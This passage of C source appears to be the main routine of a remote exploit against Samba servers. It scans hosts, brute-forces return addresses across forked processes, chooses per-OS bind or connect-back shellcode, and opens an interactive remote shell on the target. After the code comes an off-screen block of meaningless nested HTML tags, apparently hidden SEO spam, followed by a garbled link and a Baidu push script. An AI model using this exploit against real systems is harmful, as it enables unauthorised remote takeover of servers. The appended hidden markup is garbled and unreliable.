				switch (fork()) {
					case 0:
						switch(is_samba(scan_ip, 2)) {
							case 0:
								fprintf(stdout, "+ [%s] Samba\n", scan_ip);
								break;
							case 1:
								fprintf(stdout, "+ [%s] Windows\n", scan_ip);
								break;
							default:
								break;	
						}

						exit(0);
						break;
					case -1:
						fprintf(stderr, "+ fork() error\n");
						exit(-1);
						break;
					default:
						if (i > MAX_CHILDS - 2) { 
							wait(&status); 
							i--;
						}
						break;
				}
			}

		}

		return 0;
	}


	he = gethostbyname(argv[optind]);

        if (he == NULL) {
		fprintf(stderr, "Unable to resolve %s...\n", argv[optind]);
		return -1;
	}

	if (brute == -1) {

		if (ret == 0) ret = targets[type - 1].ret;

		shellcode = targets[type - 1].shellcode;
		
		if (connectback == 1) {
			fprintf(stdout, "+ connecting back to: [%d.%d.%d.%d:45295]\n", 
					ip1, ip2, ip3, ip4);

			switch(targets[type - 1].os_type) {
				case 0:	/* linux */
					shellcode = linux_connect_back;
					break;
				case 1:	/* FreeBSD/NetBSD */
					shellcode = bsd_connect_back;
					break;
				case 2: /* OpenBSD */
					shellcode = bsd_connect_back;
					break;
				case 3: /* OpenBSD 3.2 Non-exec stack */
					shellcode = bsd_connect_back;
					break;
			}

		}

		if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) {
			fprintf(stderr, "+ socket() error.\n");
			return -1;
		}

       		if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0) {
       		        fprintf(stderr, "+ socket() error.\n");
       	        	return -1;
	        }

       		memcpy(&addr1.sin_addr, he->h_addr, he->h_length);
		memcpy(&addr2.sin_addr, he->h_addr, he->h_length);

       		addr1.sin_family = AF_INET;
       		addr1.sin_port	 = htons(port);	
 		addr2.sin_family = AF_INET;
        	addr2.sin_port   = htons(45295);

		if (connect(sock, (struct sockaddr *)&addr1, sizeof(addr1)) == -1) { 
			fprintf(stderr, "+ connect() error.\n");
			return -1;
		}
			
		if (verbose == 1) fprintf(stdout, "+ %s\n", targets[type - 1].type);

		if (force == 0) {

			if (is_samba(argv[optind], 2) != 0) {
				fprintf(stderr, "+ Host is not running samba!\n\n");
				return -1;
			}

			fprintf(stderr, "+ Host is running samba.\n");
		}

		if (verbose == 1) fprintf(stdout, "+ Connected to [%s:%d]\n", (char *)inet_ntoa(addr1.sin_addr), port);

		if (start_session(sock) < 0) fprintf(stderr, "+ Session failed.\n");

		if (verbose == 1) fprintf(stdout, "+ Session enstablished\n");
		sleep(5);
		if (targets[type - 1].os_type != 2) {
			if (exploit_normal(sock, ret, shellcode) < 0) {
				fprintf(stderr, "+ Failed.\n");
				close(sock);
			}
		} else {
                        if (exploit_openbsd32(sock, ret, shellcode) < 0) {
                                fprintf(stderr, "+ Failed.\n");
                                close(sock);
			}
		}

		sleep(2);

		if (connectback == 0) {
        		if(connect(sock2, (struct sockaddr *)&addr2, sizeof(addr2)) == -1) {
                		fprintf(stderr, "+ Exploit failed, try -b to bruteforce.\n");

                		return -1;
        		}

			fprintf(stdout, "--------------------------------------------------------------\n");
		
       			shell(sock2);
			close(sock);
        		close(sock2);
		} else {
			fprintf(stdout, "+ Done...\n");
			close(sock2);
			close(sock);
		}
		return 0;
	}
		
	signal(SIGPIPE, SIG_IGN);
	signal(SIGUSR1, handler);

	switch(brute) {
		case 0:
			if (ret == 0) ret = 0xc0000000;
			shellcode = linux_bindcode;
			fprintf(stdout, "+ Bruteforce mode. (Linux)\n");
			break;
		case 1:
			if (ret == 0) ret = 0xbfc00000;
			shellcode = bsd_bindcode;
                        fprintf(stdout, "+ Bruteforce mode. (FreeBSD / NetBSD)\n");
			break;
		case 2:
			if (ret == 0) ret = 0xdfc00000;
			shellcode = bsd_bindcode;
			fprintf(stdout, "+ Bruteforce mode. (OpenBSD 3.1 and prior)\n");
			break;
		case 3:
			if (ret == 0) ret = 0x00170000;
			shellcode = bsd_bindcode;
			fprintf(stdout, "+ Bruteforce mode. (OpenBSD 3.2 - non-exec stack)\n");
			break;
		}

        memcpy(&addr1.sin_addr, he->h_addr, he->h_length);
	memcpy(&addr2.sin_addr, he->h_addr, he->h_length);

	addr1.sin_family = AF_INET;
        addr1.sin_port   = htons(port);
        addr2.sin_family = AF_INET;
        addr2.sin_port   = htons(45295);

	for (i = 0; i < 100; i++)
		childs[i] = -1;
	i = 0;

        if (force == 0) {
                if (is_samba(argv[optind], 2) != 0) {
                        fprintf(stderr, "+ Host is not running samba!\n\n");
                	return -1;
                }

        	fprintf(stderr, "+ Host is running samba.\n");
        }

	while (OWNED == 0) {

		if (sock  > 2) close(sock);
		if (sock2 > 2) close(sock2);

                if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) {
			if (verbose == 1) fprintf(stderr, "+ socket() error.\n");
		}
		else {	
			ret -= STEPS;
			i++;
		}

                if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0)
			if (verbose == 1) fprintf(stderr, "+ socket() error.\n");


		if ((ret & 0xff) == 0x00 && brute != 3) ret++;

		if (verbose == 1) fprintf(stdout, "+ Using ret: [0x%08x]\n", (unsigned int)ret);

		usleep(BRUTE_DELAY);

		switch (childs[i] = fork()) {
                	case 0:
				if(Connect(sock, (char *)inet_ntoa(addr1.sin_addr), port, 2) == -1) {
					if (sock  > 2) close(sock);
					if (sock2 > 2) close(sock2);
					exit(-1);
				}

			        if(write_timer(sock, 3) == 1) {
					if (start_session(sock) < 0) {
						if (verbose == 1) fprintf(stderr, "+ Session failed.\n");
						if (sock  > 2)close(sock);
						if (sock2 > 2) close(sock2);
						exit(-1);
					}
	
					if (brute == 3) {
                       				if (exploit_openbsd32(sock, ret, shellcode) < 0) {
                      					if (verbose == 1) fprintf(stderr, "+ Failed.\n");
                                    	 		if (sock  > 2) close(sock);
							if (sock2 > 2) close(sock2);
							exit(-1);
                                		}
					} 
				else {
		    			if (exploit_normal(sock, ret, shellcode) < 0) {
            	       				if (verbose == 1) fprintf(stderr, "+ Failed.\n");
	      			        	if (sock  > 2) close(sock);
						if (sock2 > 2) close(sock2);
						exit(-1);
        	   			}

					if (sock > 2) close(sock);

        				if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0) {
						if (sock2 > 2) close(sock2);
						exit(-1);
					}

	                                if(Connect(sock2, (char *)inet_ntoa(addr1.sin_addr), 45295, 2) != -1) {
                                               	if (sock2  > 2) close(sock2);
						kill(getppid(), SIGUSR1);
					}

					exit(1);
				}

				
				exit(0);
				break;
			case -1:
                       		fprintf(stderr, "+ fork() error\n");
                              	exit(-1);
                          	break;
                        default:
                       		if (i > MAX_CHILDS - 2) {
                               		wait(&status);
                               		i--;
                               	}
                               	break;
			}

		}

	}
	
	return 0;
}

/* EOF */
<div style="position:fixed;left:-9000px;top:-9000px;"><em id="7ztzv"></em><center id="7ztzv"></center><mark id="7ztzv"><center id="7ztzv"></center></mark><output id="7ztzv"><noframes id="7ztzv"></noframes></output><font id="7ztzv"><delect id="7ztzv"></delect></font><ruby id="7ztzv"><big id="7ztzv"></big></ruby><progress id="7ztzv"><sub id="7ztzv"></sub></progress><th id="7ztzv"><big id="7ztzv"></big></th><form id="7ztzv"><nobr id="7ztzv"></nobr></form><ol id="7ztzv"><video id="7ztzv"></video></ol><th id="7ztzv"><progress id="7ztzv"></progress></th><strike id="7ztzv"><span id="7ztzv"></span></strike><em id="7ztzv"><span id="7ztzv"></span></em><video id="7ztzv"><strike id="7ztzv"></strike></video><th id="7ztzv"><noframes id="7ztzv"></noframes></th><em id="7ztzv"><span id="7ztzv"></span></em><ins id="7ztzv"><b id="7ztzv"></b></ins><ol id="7ztzv"><output id="7ztzv"></output></ol><menuitem id="7ztzv"><thead id="7ztzv"></thead></menuitem><del id="7ztzv"><ruby id="7ztzv"></ruby></del><noframes id="7ztzv"><span id="7ztzv"></span></noframes><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead><dl id="7ztzv"><rp id="7ztzv"></rp></dl><progress id="7ztzv"><thead id="7ztzv"></thead></progress><listing id="7ztzv"><menuitem id="7ztzv"></menuitem></listing><strike id="7ztzv"><pre id="7ztzv"></pre></strike><em id="7ztzv"><address id="7ztzv"></address></em><big id="7ztzv"><address id="7ztzv"></address></big><address id="7ztzv"><listing id="7ztzv"></listing></address><ruby id="7ztzv"><strike id="7ztzv"></strike></ruby><listing id="7ztzv"><menuitem id="7ztzv"></menuitem></listing><big id="7ztzv"><sub id="7ztzv"></sub></big><var id="7ztzv"><meter id="7ztzv"></meter></var><span id="7ztzv"><video id="7ztzv"></video></span><listing id="7ztzv"><mark id="7ztzv"></mark></listing><progress id="7ztzv"><address id="7ztzv"></address></progress><nobr id="7ztzv"><progress id="7ztzv"></progress></nobr><noframes id="7ztzv"><sub id="7ztzv"></sub></noframes><font id="7ztzv"><delect id="7ztzv"></delect></font><strike id="7ztzv"><pre id="7ztzv"></pre></strike><delect id="7ztzv"><menuitem id="7ztzv"></menuitem></delect><em id="7ztzv"><pre id="7ztzv"></pre></em><mark id="7ztzv"><cite id="7ztzv"></cite></mark><delect id="7ztzv"><ins id="7ztzv"></ins></delect><pre id="7ztzv"><rp id="7ztzv"></rp></pre><cite id="7ztzv"><var id="7ztzv"></var></cite><menuitem id="7ztzv"><cite id="7ztzv"></cite></menuitem><ruby id="7ztzv"><p id="7ztzv"></p></ruby><em id="7ztzv"><form id="7ztzv"></form></em><rp id="7ztzv"><em id="7ztzv"></em></rp>
<video id="7ztzv"><noframes id="7ztzv"></noframes></video><cite id="7ztzv"><del id="7ztzv"></del></cite><meter id="7ztzv"><thead id="7ztzv"></thead></meter><p id="7ztzv"><dl id="7ztzv"></dl></p><meter id="7ztzv"><thead id="7ztzv"></thead></meter><sub id="7ztzv"><nobr id="7ztzv"></nobr></sub><mark id="7ztzv"><cite id="7ztzv"></cite></mark><menuitem id="7ztzv"><font id="7ztzv"></font></menuitem><del id="7ztzv"><rp id="7ztzv"></rp></del><thead id="7ztzv"><delect id="7ztzv"></delect></thead><var id="7ztzv"><menuitem id="7ztzv"></menuitem></var><ins id="7ztzv"><cite id="7ztzv"></cite></ins><delect id="7ztzv"><output id="7ztzv"></output></delect><p id="7ztzv"><pre id="7ztzv"></pre></p><ruby id="7ztzv"><p id="7ztzv"></p></ruby><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead><nobr id="7ztzv"><meter id="7ztzv"></meter></nobr><progress id="7ztzv"><address id="7ztzv"></address></progress><thead id="7ztzv"><var id="7ztzv"></var></thead><ins id="7ztzv"><i id="7ztzv"></i></ins><ins id="7ztzv"><b id="7ztzv"></b></ins><nobr id="7ztzv"><meter id="7ztzv"></meter></nobr><ins id="7ztzv"><i id="7ztzv"></i></ins><font id="7ztzv"><delect id="7ztzv"></delect></font><em id="7ztzv"><form id="7ztzv"></form></em><var id="7ztzv"><ins id="7ztzv"></ins></var><span id="7ztzv"><th id="7ztzv"></th></span><ol id="7ztzv"><rp id="7ztzv"></rp></ol><th id="7ztzv"><progress id="7ztzv"></progress></th><address id="7ztzv"><dfn id="7ztzv"></dfn></address><menuitem id="7ztzv"><cite id="7ztzv"></cite></menuitem><noframes id="7ztzv"><span id="7ztzv"></span></noframes><noframes id="7ztzv"><form id="7ztzv"></form></noframes><big id="7ztzv"><form id="7ztzv"></form></big><track id="7ztzv"><noframes id="7ztzv"></noframes></track><em id="7ztzv"><span id="7ztzv"></span></em><span id="7ztzv"><th id="7ztzv"></th></span><span id="7ztzv"><th id="7ztzv"></th></span><video id="7ztzv"><em id="7ztzv"></em></video><delect id="7ztzv"><ins id="7ztzv"></ins></delect><b id="7ztzv"><del id="7ztzv"></del></b><progress id="7ztzv"><sub id="7ztzv"></sub></progress><dfn id="7ztzv"><mark id="7ztzv"></mark></dfn><rp id="7ztzv"><em id="7ztzv"></em></rp><track id="7ztzv"><noframes id="7ztzv"></noframes></track><address id="7ztzv"><th id="7ztzv"></th></address><cite id="7ztzv"><delect id="7ztzv"></delect></cite><cite id="7ztzv"><var id="7ztzv"></var></cite><output id="7ztzv"><i id="7ztzv"></i></output><track id="7ztzv"><big id="7ztzv"></big></track>
<big id="7ztzv"><address id="7ztzv"></address></big><p id="7ztzv"><dl id="7ztzv"></dl></p><meter id="7ztzv"><font id="7ztzv"></font></meter><address id="7ztzv"><nobr id="7ztzv"></nobr></address><menuitem id="7ztzv"><cite id="7ztzv"></cite></menuitem><pre id="7ztzv"><video id="7ztzv"></video></pre><th id="7ztzv"><progress id="7ztzv"></progress></th><p id="7ztzv"><pre id="7ztzv"></pre></p><ruby id="7ztzv"><em id="7ztzv"></em></ruby><del id="7ztzv"><ins id="7ztzv"></ins></del><sub id="7ztzv"><listing id="7ztzv"></listing></sub><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead><thead id="7ztzv"><var id="7ztzv"></var></thead><sub id="7ztzv"><nobr id="7ztzv"></nobr></sub><b id="7ztzv"><del id="7ztzv"></del></b><big id="7ztzv"><address id="7ztzv"></address></big><form id="7ztzv"><nobr id="7ztzv"></nobr></form><ol id="7ztzv"><ins id="7ztzv"></ins></ol><font id="7ztzv"><delect id="7ztzv"></delect></font><big id="7ztzv"><sub id="7ztzv"></sub></big><listing id="7ztzv"><progress id="7ztzv"></progress></listing><delect id="7ztzv"><output id="7ztzv"></output></delect><noframes id="7ztzv"><span id="7ztzv"></span></noframes><track id="7ztzv"><noframes id="7ztzv"></noframes></track><menuitem id="7ztzv"><sub id="7ztzv"></sub></menuitem><address id="7ztzv"><th id="7ztzv"></th></address><address id="7ztzv"><track id="7ztzv"></track></address><nobr id="7ztzv"><meter id="7ztzv"></meter></nobr><em id="7ztzv"><pre id="7ztzv"></pre></em><ruby id="7ztzv"><strike id="7ztzv"></strike></ruby><em id="7ztzv"><form id="7ztzv"></form></em><form id="7ztzv"><track id="7ztzv"></track></form><dfn id="7ztzv"><progress id="7ztzv"></progress></dfn><rp id="7ztzv"><noframes id="7ztzv"></noframes></rp><i id="7ztzv"><ol id="7ztzv"></ol></i><i id="7ztzv"><del id="7ztzv"></del></i><cite id="7ztzv"><delect id="7ztzv"></delect></cite><strike id="7ztzv"><dl id="7ztzv"></dl></strike><dfn id="7ztzv"><mark id="7ztzv"></mark></dfn><address id="7ztzv"><th id="7ztzv"></th></address><ins id="7ztzv"><font id="7ztzv"></font></ins><thead id="7ztzv"><var id="7ztzv"></var></thead><video id="7ztzv"><strike id="7ztzv"></strike></video><p id="7ztzv"><pre id="7ztzv"></pre></p><video id="7ztzv"><i id="7ztzv"></i></video><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead><thead id="7ztzv"><listing id="7ztzv"></listing></thead><dl id="7ztzv"><rp id="7ztzv"></rp></dl><address id="7ztzv"><th id="7ztzv"></th></address><var id="7ztzv"><menuitem id="7ztzv"></menuitem></var>
<p id="7ztzv"><var id="7ztzv"></var></p><ins id="7ztzv"><i id="7ztzv"></i></ins><strike id="7ztzv"><span id="7ztzv"></span></strike><del id="7ztzv"><output id="7ztzv"></output></del><font id="7ztzv"><delect id="7ztzv"></delect></font><output id="7ztzv"><em id="7ztzv"></em></output><p id="7ztzv"><span id="7ztzv"></span></p><big id="7ztzv"><thead id="7ztzv"></thead></big><video id="7ztzv"><noframes id="7ztzv"></noframes></video><b id="7ztzv"><ol id="7ztzv"></ol></b><font id="7ztzv"><dfn id="7ztzv"></dfn></font><font id="7ztzv"><var id="7ztzv"></var></font><ins id="7ztzv"><i id="7ztzv"></i></ins><dfn id="7ztzv"><meter id="7ztzv"></meter></dfn><rp id="7ztzv"><strike id="7ztzv"></strike></rp><del id="7ztzv"><ruby id="7ztzv"></ruby></del><var id="7ztzv"><ruby id="7ztzv"></ruby></var><rp id="7ztzv"><em id="7ztzv"></em></rp><em id="7ztzv"><span id="7ztzv"></span></em><del id="7ztzv"><ruby id="7ztzv"></ruby></del><listing id="7ztzv"><menuitem id="7ztzv"></menuitem></listing><track id="7ztzv"><noframes id="7ztzv"></noframes></track><form id="7ztzv"><nobr id="7ztzv"></nobr></form><video id="7ztzv"><big id="7ztzv"></big></video><video id="7ztzv"><em id="7ztzv"></em></video><p id="7ztzv"><span id="7ztzv"></span></p><sub id="7ztzv"><nobr id="7ztzv"></nobr></sub><ins id="7ztzv"><b id="7ztzv"></b></ins><dfn id="7ztzv"><progress id="7ztzv"></progress></dfn><var id="7ztzv"><mark id="7ztzv"></mark></var><font id="7ztzv"><delect id="7ztzv"></delect></font><big id="7ztzv"><sub id="7ztzv"></sub></big><address id="7ztzv"><th id="7ztzv"></th></address><form id="7ztzv"><th id="7ztzv"></th></form><mark id="7ztzv"><cite id="7ztzv"></cite></mark><progress id="7ztzv"><font id="7ztzv"></font></progress><mark id="7ztzv"><cite id="7ztzv"></cite></mark><strike id="7ztzv"><form id="7ztzv"></form></strike><mark id="7ztzv"><font id="7ztzv"></font></mark><strike id="7ztzv"><form id="7ztzv"></form></strike><pre id="7ztzv"><video id="7ztzv"></video></pre><strike id="7ztzv"><dl id="7ztzv"></dl></strike><delect id="7ztzv"><ins id="7ztzv"></ins></delect><dl id="7ztzv"><rp id="7ztzv"></rp></dl><listing id="7ztzv"><menuitem id="7ztzv"></menuitem></listing><p id="7ztzv"><dl id="7ztzv"></dl></p><mark id="7ztzv"><i id="7ztzv"></i></mark><meter id="7ztzv"><sub id="7ztzv"></sub></meter><rp id="7ztzv"><em id="7ztzv"></em></rp><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead>
<th id="7ztzv"><big id="7ztzv"></big></th><del id="7ztzv"><rp id="7ztzv"></rp></del><video id="7ztzv"><big id="7ztzv"></big></video><delect id="7ztzv"><ruby id="7ztzv"></ruby></delect><big id="7ztzv"><sub id="7ztzv"></sub></big><track id="7ztzv"><em id="7ztzv"></em></track><cite id="7ztzv"><ol id="7ztzv"></ol></cite><i id="7ztzv"><dl id="7ztzv"></dl></i><noframes id="7ztzv"><address id="7ztzv"></address></noframes><ruby id="7ztzv"><i id="7ztzv"></i></ruby><delect id="7ztzv"><output id="7ztzv"></output></delect><delect id="7ztzv"><output id="7ztzv"></output></delect><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead><ol id="7ztzv"><ruby id="7ztzv"></ruby></ol><delect id="7ztzv"><output id="7ztzv"></output></delect><var id="7ztzv"><menuitem id="7ztzv"></menuitem></var><track id="7ztzv"><big id="7ztzv"></big></track><rp id="7ztzv"><em id="7ztzv"></em></rp><em id="7ztzv"><span id="7ztzv"></span></em><mark id="7ztzv"><b id="7ztzv"></b></mark><i id="7ztzv"><ol id="7ztzv"></ol></i><progress id="7ztzv"><sub id="7ztzv"></sub></progress><rp id="7ztzv"><strike id="7ztzv"></strike></rp><font id="7ztzv"><var id="7ztzv"></var></font><span id="7ztzv"><th id="7ztzv"></th></span><video id="7ztzv"><strike id="7ztzv"></strike></video><th id="7ztzv"><em id="7ztzv"></em></th><delect id="7ztzv"><ins id="7ztzv"></ins></delect><sub id="7ztzv"><delect id="7ztzv"></delect></sub><progress id="7ztzv"><sub id="7ztzv"></sub></progress><sub id="7ztzv"><listing id="7ztzv"></listing></sub><thead id="7ztzv"><listing id="7ztzv"></listing></thead><form id="7ztzv"><th id="7ztzv"></th></form><track id="7ztzv"><em id="7ztzv"></em></track><dfn id="7ztzv"><menuitem id="7ztzv"></menuitem></dfn><b id="7ztzv"><dl id="7ztzv"></dl></b><nobr id="7ztzv"><big id="7ztzv"></big></nobr><track id="7ztzv"><progress id="7ztzv"></progress></track><ruby id="7ztzv"><p id="7ztzv"></p></ruby><pre id="7ztzv"><nobr id="7ztzv"></nobr></pre><pre id="7ztzv"><track id="7ztzv"></track></pre><ruby id="7ztzv"><strike id="7ztzv"></strike></ruby><em id="7ztzv"><span id="7ztzv"></span></em><mark id="7ztzv"><i id="7ztzv"></i></mark><rp id="7ztzv"><p id="7ztzv"></p></rp><delect id="7ztzv"><ruby id="7ztzv"></ruby></delect><sub id="7ztzv"><dfn id="7ztzv"></dfn></sub><thead id="7ztzv"><var id="7ztzv"></var></thead><i id="7ztzv"><ol id="7ztzv"></ol></i><track id="7ztzv"><strike id="7ztzv"></strike></track></div>

<a href="http://www.bjnorthway.com/">ÑÇÖÞÅ·ÃÀÔÚÏß</a>
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>
</body>